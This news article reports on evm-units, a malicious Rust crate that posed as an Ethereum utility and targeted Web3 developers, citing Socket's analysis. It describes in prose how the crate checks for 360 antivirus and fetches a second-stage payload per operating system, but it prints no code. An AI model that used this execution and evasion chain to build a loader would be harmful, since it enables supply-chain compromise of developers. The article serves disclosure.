Cybersecurity analysts have identified a harmful Rust based package that was crafted to infiltrate systems running Windows, macOS, or Linux. The package silently executes malicious code on developer machines by disguising itself as a legitimate Ethereum Virtual Machine utility.
The crate, titled evm-units, was uploaded to crates dot io in April 2025 by an account named ablerust. Over eight thousand downloads were recorded before the package was removed from the repository. A second package from the same author, uniswap utils, listed evm units as a dependency and received more than seven thousand downloads.
According to researcher Olivia Brown from Socket, the malicious crate checks the victim system to determine the operating environment and whether Qihoo 360 antivirus is active. Based on this information, it retrieves and executes a hidden payload from an external server while returning a false Ethereum version value, keeping victims unaware of the ongoing compromise.
Antivirus Focus Raises Suspicion
A key detail is the crate’s explicit check for qhsafetray dot exe, a process belonging to 360 Total Security. Brown notes that this focus reveals a China centered targeting pattern, since Qihoo 360 is a prominent Chinese security company. The behavior aligns with recent cryptocurrency theft campaigns aimed at regions with large crypto user bases.
OS Specific Execution Chain
The malicious function get evm version decodes instructions and contacts an external domain, download dot videotalks dot xyz, to download the next stage payload.
The behavior differs across operating systems:
- Linux, downloads a script, stores it in the temp folder, and launches it in the background using the nohup command
- macOS, downloads a file named init and runs it through osascript in a background process
- Windows, delivers a PowerShell script named init dot ps1 into the temp directory and checks for the antivirus process before execution
If 360 Total Security is absent, the crate creates a Visual Basic Script wrapper to run PowerShell silently. If the antivirus is detected, it adjusts behavior and directly triggers PowerShell.
Web3 Developers in the Crosshairs
The references to EVM utilities and Uniswap, which is a major decentralized exchange protocol, indicate that the operation was designed to target Web3 developers. By embedding the malicious loader inside a harmless appearing function and linking it to a widely used dependency, the attacker ensured that the malware would execute automatically during package initialization.
Brown stated that ablerust embedded a cross platform second stage component in the code, which was triggered whenever developers interacted with the tool.
Found this article interesting? Follow us on Twitter , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
